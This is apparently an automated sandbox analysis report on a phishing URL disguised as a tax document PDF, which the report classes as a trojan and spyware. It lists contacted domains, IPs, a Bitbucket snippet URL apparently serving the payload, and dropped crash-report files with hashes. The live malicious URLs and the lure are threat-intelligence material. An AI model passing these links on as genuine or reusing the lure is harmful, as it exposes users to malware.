| cdn.jsdelivr.net.cdn.cloudflare.net | 104.18.186.31 | true | false | | high |
| time.google.com | 216.239.35.8 | true | false | | unknown |
| ax-0002.ax-msedge.net | 150.171.27.11 | true | false | | unknown |
| beacons-handoff.gcp.gvt2.com | 172.217.16.195 | true | false | | high |
| securefilepro.com | 45.223.17.158 | true | false | | unknown |
| beacons6.gvt2.com | 142.250.184.227 | true | false | | high |
| gbg1.ntp.netnod.se | 194.58.203.20 | true | false | | unknown |
| cdnjs.cloudflare.com | 104.17.24.14 | true | false | | high |
| www.google.com | 142.250.185.132 | true | false | | high |
| ntp.time.nl | 94.198.159.14 | true | false | | unknown |
| ntp.time.in.ua | 62.149.0.30 | true | false | | high |
| blogspot.l.googleusercontent.com | 216.58.206.33 | true | false | | unknown |
| beacons2.gvt2.com | 142.250.68.67 | true | false | | high |
| beacons.gvt2.com | 142.251.143.35 | true | false | | high |
| ntp.nict.jp | 133.243.238.164 | true | false | | high |
| x.ns.gin.ntt.net | 129.250.35.250 | true | false | | unknown |
| securefilepro.netlify.app | 3.125.36.175 | true | true | | unknown |
| pgl344p.ng.impervadns.net | 45.223.19.158 | true | false | | unknown |
| beacons4.gvt2.com | 216.239.32.116 | true | false | | high |
| d12bxbf7nz45kt.cloudfront.net | 18.245.46.46 | true | false | | unknown |
| ntp1.hetzner.de | 213.239.239.164 | true | false | | unknown |
| cpa12-march.blogspot.com | unknown | unknown | true | | unknown |
| cdn.jsdelivr.net | unknown | unknown | false | | high |
| beacons.gcp.gvt2.com | unknown | unknown | false | | high |
| gbg1.ntp.se | unknown | unknown | true | | unknown |
| www.securefilepro.com | unknown | unknown | true | | unknown |
| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| https://www.securefilepro.com/assets/css/styles.css?v=1.0 | false | Avira URL Cloud: safe | unknown |
| https://cpa12-march.blogspot.com/atom.xml | false | Avira URL Cloud: safe | unknown |
| https://securefilepro.com/portal/favicon.ico | false | Avira URL Cloud: safe | unknown |
| https://cdn.jsdelivr.net/npm/alertifyjs@1.13.1/build/alertify.min.js | false | Avira URL Cloud: safe | unknown |
| https://d12bxbf7nz45kt.cloudfront.net/images/landing/send.svg | false | Avira URL Cloud: safe | unknown |
| https://www.securefilepro.com/assets/sfp.html | false | | unknown |
| https://www.securefilepro.com/portal/polyfills.4aee66a14cad3606.js | false | Avira URL Cloud: safe | unknown |
| https://www.securefilepro.com/portal/main.690005fd134686e7.js | false | Avira URL Cloud: safe | unknown |
| https://securefilepro.netlify.app/#Amanda_Taylor_Tax_Document_2024.pdf | false | | unknown |
| https://cpa12-march.blogspot.com/faqeeer.pdf | false | Avira URL Cloud: safe | unknown |
| https://www.securefilepro.com/ | false | Avira URL Cloud: safe | unknown |
| https://d12bxbf7nz45kt.cloudfront.net/images/DrakePortals-logo.png | false | Avira URL Cloud: safe | unknown |
| https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js | false | | high |
| https://cdnjs.cloudflare.com/ajax/libs/jszip/3.10.1/jszip.min.js | false | Avira URL Cloud: safe | unknown |
| https://d12bxbf7nz45kt.cloudfront.net/images/landing/anytime.svg | false | Avira URL Cloud: safe | unknown |
| https://d12bxbf7nz45kt.cloudfront.net/images/landing/relax.svg | false | Avira URL Cloud: safe | unknown |
| https://www.securefilepro.com/favicon.ico | false | Avira URL Cloud: safe | unknown |
| https://www.securefilepro.com/_Incapsula_Resource?SWKMTFSR=1&e=0.08098935374105776 | false | Avira URL Cloud: safe | unknown |
| https://www.securefilepro.com/portal/styles.cc0a641a0c9da1ad.css | false | Avira URL Cloud: safe | unknown |
| https://cdn.jsdelivr.net/npm/alertifyjs@1.13.1/build/css/alertify.min.css | false | Avira URL Cloud: safe | unknown |
| https://securefilepro.netlify.app/ | true | Avira URL Cloud: safe | unknown |
| https://cdn.jsdelivr.net/npm/javascript-obfuscator/dist/index.browser.js | false | Avira URL Cloud: safe | unknown |
| https://d12bxbf7nz45kt.cloudfront.net/images/landing/get.svg | false | Avira URL Cloud: safe | unknown |
| https://bitbucket.org/!api/2.0/snippets/ansidjaassdasmjkkkkk/q7MRe8/3fdc148e8846d2e71b5743d242a56ff62d0a4dfc/files/file | false | Avira URL Cloud: safe | unknown |
| https://www.securefilepro.com/portal/runtime.5be9c3325b3311c4.js | false | Avira URL Cloud: safe | unknown |
| https://www.securefilepro.com/_Incapsula_Resource?SWJIYLWA=719d34d31c8e3a6e6fffd425f7e032f3&ns=1&cb=123035775 | false | Avira URL Cloud: safe | unknown |
| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 142.250.185.99 | unknown | United States | 15169 | GOOGLEUS | false |
| 194.58.203.20 | gbg1.ntp.netnod.se | Sweden | 57021 | NTP-SEAnycastedNTPservicesfromNetnodIXPsSE | false |
| 142.250.185.206 | unknown | United States | 15169 | GOOGLEUS | false |
| 13.107.6.158 | unknown | United States | 8068 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false |
| 94.198.159.14 | ntp.time.nl | Netherlands | 1140 | SIDNNL | false |
| 216.239.35.8 | time.google.com | United States | 15169 | GOOGLEUS | false |
| 151.101.193.229 | jsdelivr.map.fastly.net | United States | 54113 | FASTLYUS | false |
| 216.58.206.33 | blogspot.l.googleusercontent.com | United States | 15169 | GOOGLEUS | false |
| 185.166.143.49 | bitbucket.org | Germany | 16509 | AMAZON-02US | false |
| 104.40.67.19 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false |
| 142.251.168.84 | unknown | United States | 15169 | GOOGLEUS | false |
| 162.159.61.3 | chrome.cloudflare-dns.com | United States | 13335 | CLOUDFLARENETUS | false |
| 45.223.17.158 | securefilepro.com | United States | 19551 | INCAPSULAUS | false |
| 185.208.159.170 | unknown | Switzerland | 34888 | SIMPLECARRER2IT | true |
| 18.245.46.46 | d12bxbf7nz45kt.cloudfront.net | United States | 16509 | AMAZON-02US | false |
| 142.250.184.227 | beacons6.gvt2.com | United States | 15169 | GOOGLEUS | false |
| 172.64.41.3 | unknown | United States | 13335 | CLOUDFLARENETUS | false |
| 23.199.214.10 | unknown | United States | 16625 | AKAMAI-ASUS | false |
| 142.250.186.35 | unknown | United States | 15169 | GOOGLEUS | false |
| 104.17.24.14 | cdnjs.cloudflare.com | United States | 13335 | CLOUDFLARENETUS | false |
| 3.125.36.175 | securefilepro.netlify.app | United States | 16509 | AMAZON-02US | true |
| 213.239.239.164 | ntp1.hetzner.de | Germany | | | |
                                                                              24940HETZNER-ASDEfalse
                                                                              104.18.186.31
                                                                              cdn.jsdelivr.net.cdn.cloudflare.netUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              62.149.0.30
                                                                              ntp.time.in.uaUkraine
                                                                              15497COLOCALLInternetDataCenterColoCALLUAfalse
                                                                              142.250.185.132
                                                                              www.google.comUnited States
                                                                              15169GOOGLEUSfalse
                                                                              129.250.35.250
                                                                              x.ns.gin.ntt.netUnited States
                                                                              2914NTT-COMMUNICATIONS-2914USfalse
                                                                              13.107.42.16
                                                                              unknownUnited States
                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                              142.250.185.238
                                                                              unknownUnited States
                                                                              15169GOOGLEUSfalse
                                                                              216.58.206.46
                                                                              unknownUnited States
                                                                              15169GOOGLEUSfalse
                                                                              142.251.173.84
                                                                              unknownUnited States
                                                                              15169GOOGLEUSfalse
                                                                              142.250.185.170
                                                                              unknownUnited States
                                                                              15169GOOGLEUSfalse
                                                                              142.250.181.227
                                                                              unknownUnited States
                                                                              15169GOOGLEUSfalse
                                                                              133.243.238.164
                                                                              ntp.nict.jpJapan9355NICTNationalInstituteofInformationandCommunicationsTefalse
                                                                              142.250.185.196
                                                                              unknownUnited States
                                                                              15169GOOGLEUSfalse
                                                                              45.223.19.158
                                                                              pgl344p.ng.impervadns.netUnited States
                                                                              19551INCAPSULAUSfalse
                                                                              172.217.18.106
                                                                              unknownUnited States
                                                                              15169GOOGLEUSfalse
                                                                              150.171.27.11
                                                                              ax-0002.ax-msedge.netUnited States
                                                                              8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                              142.250.186.142
                                                                              unknownUnited States
                                                                              15169GOOGLEUSfalse
                                                                              85.215.93.134
                                                                              unknownGermany
                                                                              6724STRATOSTRATOAGDEfalse
                                                                              142.250.184.238
                                                                              unknownUnited States
                                                                              15169GOOGLEUSfalse
                                                                              104.17.25.14
                                                                              unknownUnited States
                                                                              13335CLOUDFLARENETUSfalse
                                                                              IP
                                                                              192.168.2.16
                                                                              192.168.2.5
                                                                              127.0.0.1
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1638776
Start date and time: 2025-03-14 18:33:21 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsinteractivecookbook.jbs
Sample URL: https://securefilepro.netlify.app/#Amanda_Taylor_Tax_Document_2024.pdf
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 53
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• EGA enabled
Analysis Mode: stream
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.win@91/58@92/214
• Excluded process from analysis (whitelisted): svchost.exe
• Excluded IPs from analysis (whitelisted): 142.250.186.142, 142.250.184.227, 142.250.185.174, 142.251.168.84, 142.250.186.174, 142.250.181.238
• Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com
• Not all processes were analyzed; the report is missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Timeout during stream target processing; the analysis might miss dynamic analysis data.
• VT rate limit hit for: https://securefilepro.netlify.app/#Amanda_Taylor_Tax_Document_2024.pdf
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.8026733441696363
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:DECA99C218DA5B999DE16DC74EB1F93A
                                                                              SHA1:E16C84E8355FAFC802E13BB1F1FB3F7EF3E71669
                                                                              SHA-256:E08A3642C476EA611CE73D721497F5BFDB575C670F2F04AA06D12CDA8A5ADA83
                                                                              SHA-512:137194C266764969BBA52E543E2F1D2F3CC5685845942C543CB8B299058F5347BE79F8231D1FB8BB693F2EACDCD005E716234B10193AE82B6B939D722C70D73C
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.4.4.7.3.0.6.1.6.7.8.3.1.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.4.4.7.3.0.6.8.6.5.8.1.3.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.9.5.1.8.d.5.3.-.9.e.9.b.-.4.9.a.6.-.a.c.0.5.-.5.d.e.b.2.f.3.1.a.6.d.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.d.0.-.0.0.0.1.-.0.0.1.9.-.0.0.e.3.-.a.9.6.c.0.7.9.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.4.3.5.3.8.8.1.e.7.f.4.e.9.c.7.6.1.0.f.4.e.0.4.8.9.1.8.3.b.5.5.b.b.5.8.b.b.5.7.4.!.M.S.B.u.i.l.d...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.9././.1.0././.2.5.:.0.4.:.1.8.:.5.7.!.1.d.d.5.0.!.M.S.B.u.i.l.d...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.8026205586342221
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:791AF94847AAA33814392FE9C8A55B88
                                                                              SHA1:9BC14CD195E57DB794A259A5B2FB17D22A05D0AF
                                                                              SHA-256:D05715B9F0495C66CBC3D8265BE89B99C0348A2F3B9211EB6A8E7C7E4AEC7D34
                                                                              SHA-512:4986B7A6CC711C70AFBF27ED73706C989D399F7B0D8055AD42B2734F35EFB66DE951308C30EBBCB22DD7BD5A2E6124E5F5471D0BBE5B407731640C8BAB05A3CD
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.4.4.7.3.0.6.2.4.8.6.3.2.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.4.4.7.3.0.6.9.4.5.6.3.7.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.a.4.5.4.3.f.3.-.b.4.d.4.-.4.3.4.c.-.9.d.e.d.-.1.8.3.6.8.e.2.b.b.c.8.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.5.0.-.0.0.0.1.-.0.0.1.9.-.6.4.0.3.-.a.2.6.c.0.7.9.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.4.3.5.3.8.8.1.e.7.f.4.e.9.c.7.6.1.0.f.4.e.0.4.8.9.1.8.3.b.5.5.b.b.5.8.b.b.5.7.4.!.M.S.B.u.i.l.d...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.9././.1.0././.2.5.:.0.4.:.1.8.:.5.7.!.1.d.d.5.0.!.M.S.B.u.i.l.d...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.8907714329991707
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:8AFA6700971220253686FBB0F8D73C81
                                                                              SHA1:B40DA2DE66F596BEABFA6E7EFB1A311B5E8E253D
                                                                              SHA-256:BE9EB2509FBA3AEA83B56A8D25A2642DA5E966495593E747C993FE40D0AB129F
                                                                              SHA-512:14ABA8C7310A2C3B97EF2837818278A59203589FBAC15410DB29FAC014EECCC930E6150031A590960FE1A4E87AABEACC51E1177EACED94660F52A91018686FB7
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.4.4.7.3.0.6.0.9.0.7.3.6.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.4.4.7.3.0.6.8.1.8.7.0.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.1.7.2.4.c.c.e.-.7.0.7.c.-.4.6.0.d.-.9.0.d.7.-.9.2.d.a.c.8.1.b.3.2.a.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.9.8.-.0.0.0.1.-.0.0.1.9.-.4.c.2.a.-.9.a.6.c.0.7.9.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.9.6.f.a.7.2.6.f.c.8.4.f.d.4.6.d.0.3.d.d.3.c.3.2.6.8.9.f.6.4.5.e.0.4.2.2.2.7.8.!.R.e.g.S.v.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.9././.1.0././.2.5.:.0.9.:.0.1.:.0.0.!.1.5.0.b.1.!.R.e.g.S.v.c.s...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):65536
                                                                              Entropy (8bit):0.8908946362813499
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:4C16A5DB5D745E00EE8F91BD2E6A0BDB
                                                                              SHA1:47C5488C0339135C5C207EE4B2C783D00C89F176
                                                                              SHA-256:CEFA5545C7F55993A1490B814069522921EFDC3C7CAECF925D72F233FE451722
                                                                              SHA-512:9008BAD2EF160ACBE6D7E72BB8416B8C17554BD63EF9A7D552AD60DB7B0D9E1AAA298AF3DC5B6918C90507A3D6A44AE51A191AFC6B177A856C01C20654BA4498
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.6.4.4.7.3.0.6.0.1.0.3.0.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.6.4.4.7.3.0.6.8.8.2.3.1.1.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.1.1.7.b.8.5.e.-.4.0.8.2.-.4.d.3.b.-.a.9.c.b.-.b.8.c.1.1.1.d.3.7.a.8.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.9.c.-.0.0.0.1.-.0.0.1.9.-.2.6.9.6.-.9.e.6.c.0.7.9.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.9.6.f.a.7.2.6.f.c.8.4.f.d.4.6.d.0.3.d.d.3.c.3.2.6.8.9.f.6.4.5.e.0.4.2.2.2.7.8.!.R.e.g.S.v.c.s...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.1.9././.1.0././.2.5.:.0.9.:.0.1.:.0.0.!.1.5.0.b.1.!.R.e.g.S.v.c.s...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):7622
                                                                              Entropy (8bit):3.7057129631733656
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:20AF70B4087FA5D19B776D62D7FF4D5E
                                                                              SHA1:E1D177789C06B4AD5F9B9C889297C8E83AA055F6
                                                                              SHA-256:ECC0C5AE6F90CB0B760E39E3359744F0121A321B0D428689518ED3EDEEE18F1A
                                                                              SHA-512:C848460C744AA68182BB05DAD08A7EC50510F2591D7A50964F869D90BDBC01AC3E24CE0FC3DC05F40F4062A29844D2781AA5B5F9812B421FC293614440DCC8D0
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.7.6.<./.P.i.
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):7622
                                                                              Entropy (8bit):3.707764835562751
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:E582E9D1FD30945C34ED6EA94CA6206A
                                                                              SHA1:8BC940238C4D83047392C844C0C0F1ED9C633749
                                                                              SHA-256:F3749B5DDDDAB9576B001CA2536F08706FAFA7753E72C83F4C00B194363D64A8
                                                                              SHA-512:FAD577AB950F4FC4891ADBF458BBC9BABEBF25735C985EF19E111C915D50ACD47C3BB29C8B0875F14C828FAB68054D561800F8EC07EB0F251D67C13A99A2C25F
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.8.0.<./.P.i.
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):4614
                                                                              Entropy (8bit):4.485063967834886
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:6645E570C2EB2C98D38ECF1F18C1AF01
                                                                              SHA1:2D5A84D8B1DA02BFE5A169B75DADC4390370C51B
                                                                              SHA-256:205EE75FE8BCE2DBC9101E36387CC426145351FA5560E5C975E0577199C53752
                                                                              SHA-512:725E6668FB247E08485A1A2A42D5E9ECC0A4F504A5A088F4795E167ABC168ABD3C3A3FF2343620DF52B9F42FBF544553E64CFCA3128DBFDD39A2931439E3E490
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="760837" />.. <arg nm="osinsty" val="2" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):7622
                                                                              Entropy (8bit):3.7053129205097055
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:31C48ADB4CEE793D7E1B6A335AAB9550
                                                                              SHA1:D63FE11A2BF51A595D990D27118B61C53495A837
                                                                              SHA-256:0D8EE0F0483337BB2B7C93AC3C4AFBCBDE0A5640C65B63F94F4BEE13580D99B2
                                                                              SHA-512:86182764754DDF141E68F667538B26B862DE598E11AB88BC79FCFFDF321EB5E698F227C5FA92C3FD433536547793562AEC38C947FB62755AD5F6A21F1B2A271D
                                                                              Malicious:false
                                                                              Reputation:unknown
                                                                               Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>..  <WindowsNTVersion>10.0</WindowsNTVersion>..  <Build>19045</Build>..  <Product>(0x30): Windows 10 Pro</Product>..  <Edition>Professional</Edition>..  <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>..  <Revision>2006</Revision>..  <Flavor>Multiprocessor Free</Flavor>..  <Architecture>X64</Architecture>..  <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>..  <Pid>4816</Pi
                                                                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):7622
                                                                              Entropy (8bit):3.704607115204237
                                                                              Encrypted:false
                                                                              SSDEEP:
                                                                              MD5:0491554675F823383B92A2BBBE752ABF
                                                                              SHA1:263CD09F7A9968820C738FBACE625E881EFFE5F1
